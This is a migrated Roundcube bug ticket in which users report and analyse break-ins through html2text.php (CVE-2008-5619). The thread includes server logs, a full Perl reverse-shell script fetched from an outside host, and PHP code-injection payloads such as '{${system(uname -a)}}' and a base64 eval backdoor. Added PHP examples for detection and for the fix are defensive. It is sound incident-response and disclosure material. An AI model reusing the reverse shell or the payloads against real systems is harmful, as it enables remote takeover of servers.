Break-in possibility via html2text.php? #1993

Closed
rcubetrac opened this Issue Dec 9, 2008 · 25 comments

Reported by RealMurphy on 9 Dec 2008 10:46 UTC as Trac ticket #1485618

Hi all,

Since I cannot reproduce this, I'll try to describe this problem from the current installation status and not against trunk (sorry for that).

Last night someone broke into my Apache container via Roundcube (99.9% sure here). The system is a current Debian Lenny with these versions:

roundcube 0.2-beta
PHP is 5.2.6
mailserver is postfix on a remote virtual server

In the logs I have found the following:

apache's access.log:

192.168.100.2 - - [08/Dec/2008:23:07:50 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:07:53 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:05:16 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:08:09 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"

192.168.100.2 is another webserver acting as a proxy to this webmail apache (i.e. just rewriting and forwarding the requests), the real IP was

200.171.152.187 - - [08/Dec/2008:23:07:50 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
200.171.152.187 - - [08/Dec/2008:23:07:53 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
200.171.152.187 - - [08/Dec/2008:23:05:16 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
200.171.152.187 - - [08/Dec/2008:23:08:09 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 502 595 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"

In the error log I see this nasty bit at the same time:

--2008-12-08 23:05:16--  http://mmbt.co.uk/img/back.txt
Resolving mmbt.co.uk... 81.31.121.138
Connecting to mmbt.co.uk|81.31.121.138|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 541 [text/plain]
Saving to: `back.txt.1'

     0K                                                       100% 56.0M=0s

2008-12-08 23:05:16 (56.0 MB/s) - `back.txt.1' saved [541/541]

For completeness this is the script which was downloaded:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

There is nothing in either console, errors or sendmail in Roundcube's log messages.

Since I believe this is potentially dangerous (and this incident happened to put my box onto several blacklists for sending out >50k spam emails) I've bumped up the severity.

Anything else you could need from me?

Cheers

Carsten

Keywords: security
Migrated-From: http://trac.roundcube.net/ticket/1485618

Owner changed by @alecpl on 9 Dec 2008 11:10 UTC

=> none

Milestone changed by @alecpl on 9 Dec 2008 11:10 UTC

later => 0.2-stable

Comment by ziba on 9 Dec 2008 16:24 UTC

bin/html2text.php does use html_entity_decode which had a security issue:
http://www.juniper.net/security/auto/vulnerabilities/vuln17296.html

but that was supposed to be fixed in PHP 5.1.3-RC1

Comment by ksteinhoff on 9 Dec 2008 17:10 UTC

Why do you suspect html2text.php? The time stamp on error log entry you quote is 23:05:16 and the time stamps in your transfer log lines begin at 23:07:50.

Comment by RealMurphy on 10 Dec 2008 08:21 UTC

OK, trying to do it better this time. html2text.php was the only call with POST data. Unless I'm mistaken, with a GET you will not be able to break into a system, right? The initial copy & paste was not covering the full log file, sorry about that. This is the full access.log:

192.168.100.2 - - [08/Dec/2008:17:41:46 +0100] "GET /roundcube/skins/default/images/display/info.png HTTP/1.1" 200 2162 "https://myhost/roundcube/skins/default/common.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:04:51 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:04:55 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 79 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:04:59 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 88 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:05:09 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:05:38 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:06:26 +0100] "GET /roundcube/ HTTP/1.1" 200 1247 "http://www.google.com/search?hl=en&q=intitle:%22RoundCube+Webmail%22+site:com&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:27 +0100] "GET /roundcube/skins/default/images/favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:28 +0100] "GET /roundcube/skins/default/common.css HTTP/1.1" 200 6680 "https://myhost/roundcube/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:28 +0100] "GET /roundcube/program/js/common.js HTTP/1.1" 200 16650 "https://myhost/roundcube/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:29 +0100] "GET /roundcube/program/js/app.js HTTP/1.1" 200 110423 "https://myhost/roundcube/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:32 +0100] "GET /roundcube/skins/default/images/roundcube_logo.png HTTP/1.1" 200 4868 "https://myhost/roundcube/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:32 +0100] "GET /roundcube/skins/default/images/listheader_aqua.gif HTTP/1.1" 200 270 "https://myhost/roundcube/skins/default/common.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:32 +0100] "GET /roundcube/skins/default/images/buttons/bg.gif HTTP/1.1" 200 211 "https://myhost/roundcube/skins/default/common.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:40 +0100] "GET /roundcube/program/js/tiny_mce/r.php HTTP/1.1" 200 33924 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:41 +0100] "GET /roundcube/program/js/tiny_mce/r.php HTTP/1.1" 200 33924 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:07:50 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:07:53 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:05:16 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:08:09 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [09/Dec/2008:06:55:28 +0100] "GET /roundcube/ HTTP/1.1" 200 1247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.168.100.2 - - [09/Dec/2008:12:56:27 +0100] "GET /roundcube/ HTTP/1.1" 200 1247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
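
As an added example (not code from this ticket or from Roundcube), here is a small PHP script that applies the heuristics raised in this thread to a handful of access-log lines. The lines are constructed for the example, modelled on the ones above but written in Apache's native `[dd/Mon/yyyy:HH:MM:SS +zone]` form; the regex, the function names and the rules are my own. It flags POSTs to html2text.php, a crawler User-Agent on a POST, 5xx answers, and any line whose timestamp is earlier than an already-logged neighbour. That last check bears on ksteinhoff's timing question: Apache stamps a line with the request's start time but only writes it when the request finishes, so a line that appears out of order belongs to a request that ran for a long time, which is one reading of why the 23:05:16 POST shows up after 23:07:53 and lines up with the wget entry in the error log.

```php
<?php
// Added example, not part of the ticket: heuristics over Apache combined-log
// lines modelled on the thread's (constructed sample, not a verbatim copy).
$sample = <<<'LOG'
192.168.100.2 - - [08/Dec/2008:23:04:51 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:06:26 +0100] "GET /roundcube/ HTTP/1.1" 200 1247 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:07:50 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:07:53 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:05:16 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:08:09 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 502 595 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
LOG;

// Apache "combined" format: ip ident user [time] "method path proto" status bytes "referer" "ua"
const COMBINED = '/^(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>\S+) (?<path>\S+) [^"]*" (?<status>\d{3}) (?<bytes>\S+) "(?<referer>[^"]*)" "(?<ua>[^"]*)"$/';

function parseLine(string $line): ?array
{
    if (!preg_match(COMBINED, $line, $m)) {
        return null;                                   // not combined format, skip it
    }
    $when = DateTime::createFromFormat('d/M/Y:H:i:s O', $m['ts']);
    if ($when === false) {
        return null;
    }
    return [
        'ip' => $m['ip'], 'when' => $when, 'method' => $m['method'],
        'path' => $m['path'], 'status' => (int) $m['status'], 'ua' => $m['ua'],
    ];
}

function analyse(string $log): array
{
    $findings = [];
    $latest = null;                                    // latest timestamp seen so far
    foreach (preg_split('/\R/', trim($log)) as $n => $line) {
        $r = parseLine($line);
        if ($r === null) {
            continue;
        }
        $tag = sprintf('#%d %s %s %s', $n + 1, $r['when']->format('H:i:s'), $r['method'], $r['path']);
        if ($r['method'] === 'POST' && preg_match('~/bin/html2text\.php$~', $r['path'])) {
            $findings[] = "$tag: POST to html2text.php, the endpoint abused in CVE-2008-5619";
        }
        if ($r['method'] === 'POST' && stripos($r['ua'], 'googlebot') !== false) {
            $findings[] = "$tag: crawler User-Agent on a POST; a real crawler fetches pages with GET";
        }
        if ($r['status'] >= 500) {
            $findings[] = "$tag: server error {$r['status']}";
        }
        if ($latest !== null && $r['when'] < $latest) {
            // Apache stamps the start time but writes the line at completion,
            // so an out-of-order line is a request that ran for at least this long.
            $secs = $latest->getTimestamp() - $r['when']->getTimestamp();
            $findings[] = "$tag: logged out of order; request ran for at least {$secs}s";
        }
        if ($latest === null || $r['when'] > $latest) {
            $latest = $r['when'];
        }
    }
    return $findings;
}

foreach (analyse($sample) as $finding) {
    echo $finding, PHP_EOL;
}
```

Run it with `php analyse.php`; on the constructed sample the 23:05:16 line is reported as having run for at least 157 seconds, the span that, in the thread's real log, covers the wget download.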

Comment by estadtherr on 10 Dec 2008 19:29 UTC

If I understand the description, a vulnerability in html2text.php allowed an attacker to cause your web server to download a malicious perl script (is back.txt the perl script or is back.txt yet another file?) This perl script opens a socket to a host/port specified on its command line and hooks a command shell's input/output to that socket. Through this remote shell, the attacker was able to send out spam from your server.

How did the attacker get the perl script to execute? Are there two vulnerabilities, i.e. allowing a download and allowing execution of an arbitrary script?

Comment by RealMurphy on 10 Dec 2008 19:52 UTC

It looks like back.txt is the local file name of the perl script. Since I just see the wget output and not the command line, it's hard to tell. wget downloaded this file to /tmp and also a zip file named jess.zip, which I have yet to figure out what it does (sorry for not mentioning this earlier, I forgot to look where back.txt would be on the system):

webmail:/tmp# file jess.zip
jess.zip: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
webmail:/tmp# ldd jess.zip
        not a dynamic executable

Of course this is not a zip file but a root exploit; running strings shows:

Linux vmsplice Local Root Exploit
 By qaaz
!@#$

OK, rounding it up again: it seems that the multiple POST requests were used to download the perl script and the root exploit, and were possibly also used for starting it; however, that part I still don't know how they might have achieved - but my knowledge there is rather limited.

Keywords changed by @till on 11 Dec 2008 16:06 UTC

security

Comment by @till on 11 Dec 2008 16:11 UTC

That's interesting and we haven't really analyzed this yet, but the quick fix to this issue is to install mod_security on the server. GotRoot has a bunch of filter rules and they catch this stuff easily.

Not the solution to the problem, but a workaround.

Thanks for reporting!

Comment by @alecpl on 12 Dec 2008 08:05 UTC

Found vulnerable preg_replace() use. Fixed in f50cc72, but we'll know for sure when we get POST data used for attack. Closing the ticket now.

Status changed by @alecpl on 12 Dec 2008 08:05 UTC

new => closed

@rcubetrac rcubetrac closed this Dec 12, 2008

Comment by RealMurphy on 22 Dec 2008 07:36 UTC

I'm still running 0.2-beta as a kind of honeypot. During the night from Saturday to Sunday someone tried the same hack again, but this line did not really log much:

file_put_contents('/var/log/roundcube/hack', date('r').': '.print_r($_REQUEST, true)."\n", FILE_APPEND);

The result:

Sun, 21 Dec 2008 02:42:28 +0100: Array
(
)

Sun, 21 Dec 2008 02:42:32 +0100: Array
(
)

Sun, 21 Dec 2008 02:42:54 +0100: Array
(
)

Apache log lines:

192.168.100.2 - - [21/Dec/2008:02:42:27 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [21/Dec/2008:02:42:32 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 79 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [21/Dec/2008:02:42:54 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"

I leave this issue closed but may add more info on the exploit if I get some.

Comment by @alecpl on 22 Dec 2008 07:47 UTC

Check variables_order in php.ini and set it to "GPC".

Comment by RealMurphy on 22 Dec 2008 08:01 UTC

Done, waiting for next attack

Comment by pnfisher on 22 Dec 2008 23:10 UTC

We had someone probe our system for the html2text.php exploit today. I've removed the "Host" header, which was properly set.

POST /rc/bin/html2text.php HTTP/1.1
Pragma: no-cache
Accept: */*
Content-Type: ''
Connection: Keep-Alive
Content-Length: 28

<b>{${system(uname -a)}}</b>

Comment by @alecpl on 23 Dec 2008 07:36 UTC

This bug is known as CVE-2008-5619

Comment by paul on 14 Jan 2009 08:47 UTC

We were also attacked through html2text.php. The hacker tried to install a backdoor, probably using 'b{${EVAL(BASE64_DECODE($_SERVER[HTTP_ACCEPT]))}}/b' as POST data, as explained on http://zastita.com/015038/roundcube-webmail-.html.
In the announcement of the security update for Roundcube 0.2 Beta, you might have mentioned that 0.1 Stable was also vulnerable.

Comment by stuge on 6 May 2009 23:52 UTC

A customer of mine was also hit by this.

While f50cc72 fixes the problem in a perfectly safe manner and also adds proper handling for multibyte characters (excellent!), no analysis I have read so far has been completely correct about what is really going on.

preg_replace() with the e modifier allows execution of PHP code, but that's not the problem.

Before the superior fix in f50cc72, the problem was how entries in the html2text::$replace array were written like so:

      'strtoupper("\\1")',                    // <b>

instead of:

      'strtoupper(\'\\1\')',                    // <b>

When using double quotes in the strtoupper() call, any text which is replaced into there from the POST data can contain complex strings and will have those complex strings processed by PHP, when the entire argument really must be handled as untrusted input.

Using single quotes clarifies to the PHP interpreter that this is data which should not be processed further, so any complex strings will be ignored.
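
To make stuge's point concrete, here is an added PHP example; it is not Roundcube's code and not the f50cc72 change, whose exact content this thread does not show. The `<b>` rule is approximated by the `$search` pattern below, and `demo_marker()`, the input string and the three converter functions are constructed for the demo. The marker function only counts how often it is called, so whether that counter moves tells you whether the interpreter treated the captured text as code rather than data. The two /e variants only execute on PHP 5 (the modifier was removed in PHP 7, which is why the script skips them elsewhere); the callback variant runs on any PHP version and avoids eval() altogether, which is the shape to reach for regardless of quoting.

```php
<?php
// Added example (not Roundcube's code): three shapes of an html2text-style
// <b> rule, run against a harmless input that carries PHP complex-string syntax.

// Marker: a call to it proves the replacement text was evaluated as code.
// It only increments a counter and does nothing else.
$GLOBALS['marker_calls'] = 0;
function demo_marker()
{
    $GLOBALS['marker_calls']++;
    return 'x';
}

// Constructed input a client might POST; harmless because demo_marker() is.
$input  = '<b>{${demo_marker()}}</b>';
// Approximation of the <b> rule (the real pattern is not quoted in the thread).
$search = '/<b[^>]*>(.*?)<\/b>/i';

// 1. Vulnerable shape (PHP 5 only): /e makes preg_replace eval() the
//    replacement, and the double quotes let "{${...}}" from the capture be
//    interpolated, i.e. executed, before strtoupper() ever sees it.
function convert_e_doublequoted($html, $search)
{
    return @preg_replace($search . 'e', 'strtoupper("\\1")', $html);
}

// 2. Single-quoted shape, as stuge describes: still /e, but the capture lands
//    inside a single-quoted literal, so no interpolation takes place.
function convert_e_singlequoted($html, $search)
{
    return @preg_replace($search . 'e', 'strtoupper(\'\\1\')', $html);
}

// 3. Callback shape: no eval() anywhere, works on every PHP version. The
//    capture reaches the callback as a plain string and is never parsed.
function convert_callback($html, $search)
{
    return preg_replace_callback($search, function (array $m) {
        return strtoupper($m[1]);
    }, $html);
}

function run($label, $fn, $input, $search)
{
    $before = $GLOBALS['marker_calls'];
    $out    = $fn($input, $search);
    $ran    = $GLOBALS['marker_calls'] > $before ? 'YES' : 'no';
    printf("%-20s output=%-26s marker evaluated: %s\n", $label, var_export($out, true), $ran);
}

run('callback', 'convert_callback', $input, $search);
if (version_compare(PHP_VERSION, '7.0.0', '<')) {
    run('/e + double quotes', 'convert_e_doublequoted', $input, $search);
    run('/e + single quotes', 'convert_e_singlequoted', $input, $search);
} else {
    echo "/e variants skipped: the modifier was removed in PHP 7, which closes this bug class outright\n";
}
```

On PHP 5 the double-quoted variant reports the marker as evaluated and returns an empty string (the interpolated expression resolved to an undefined variable), the single-quoted variant returns the literal text upper-cased with the marker untouched, and the callback variant does the same on every version. Type declarations are deliberately left out so the file also parses on PHP 5, where the two /e lines can actually be observed.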

Comment by stuge on 6 May 2009 23:56 UTC

Replying to stuge:

no analysis I have read so far has been completely correct about what is really going on.

To be fair, Jacobo Avariento Gimeno at Sofistic described the problem accurately, but didn't point out the double quotes in the function call.

Comment by gittar on 14 Feb 2010 01:35 UTC

Well, I think you are lucky to have read the logs in time and identified the script. I found many people who are totally unaware of the fact that there is a script running on their mail server to send spam mails. I think you need to check the server cache for this purpose; there might be other (unusual) activity on the server, like increasing page impressions, or compare the bandwidth of two consecutive days at that time. I would like to suggest AVG download to avoid these situations. Thanks

Severity changed by gittar on 14 Feb 2010 01:35 UTC

critical => minor

Milestone changed by gittar on 14 Feb 2010 01:35 UTC

0.2-stable => later

Comment by @alecpl on 26 Feb 2010 07:11 UTC

Re-assigned Milestone and Version

Milestone changed by @alecpl on 26 Feb 2010 07:11 UTC

=> later

Comment by tbbw on 2 Jun 2010 01:40 UTC

I can confirm that people have started to make auto-infection scripts for this vuln.
Just yesterday I got a perl IRC bot through this hole that got its nest on Undernet.
Some .ro kiddies farming.

They scan common webmail locations, so until this is fixed it's best to change your webmail URL to something cryptic instead of myhost.com/webmail or myhost.com/mail

@rcubetrac rcubetrac added this to the later milestone Mar 20, 2016